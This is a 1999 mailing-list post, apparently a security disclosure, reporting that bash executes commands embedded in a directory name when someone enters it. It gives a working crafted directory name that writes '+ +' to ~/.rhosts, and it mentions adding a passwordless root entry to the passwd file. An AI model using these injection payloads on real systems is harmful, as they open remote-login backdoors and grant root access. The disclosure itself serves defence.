Bash Bug

From: Shadow (shadowat_private)
Date: Tue Apr 20 1999 - 18:25:47 PDT

    Figured while everyone was working with bash, I might as well make this
    one public(I apologize if this is old news, apparently it hasnt been fixed
    if so).

    If a user creates a directory with a command like

    mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "

    and someone cd's into said directory, either by accident, or whatever,
    then it will cause it to actually execute. I also did this with a passwd
    file, echo a user such as r00t::0:0:\57root\57bin\57bash instead of + + to
    the rhosts. Played with symlinks and a few other ways to see if perhaps
    maybe the system could trip it if a user made the directory in say /tmp.
    Granted it may be a long shot on the users part, the ability to do so is a
    bad thing IMHO. This didnt seem to work on any of my BSD boxes.

    shadow - CLE

    Most Failure is due to giving up, not realizing how close to success you
    were - Thomas Edison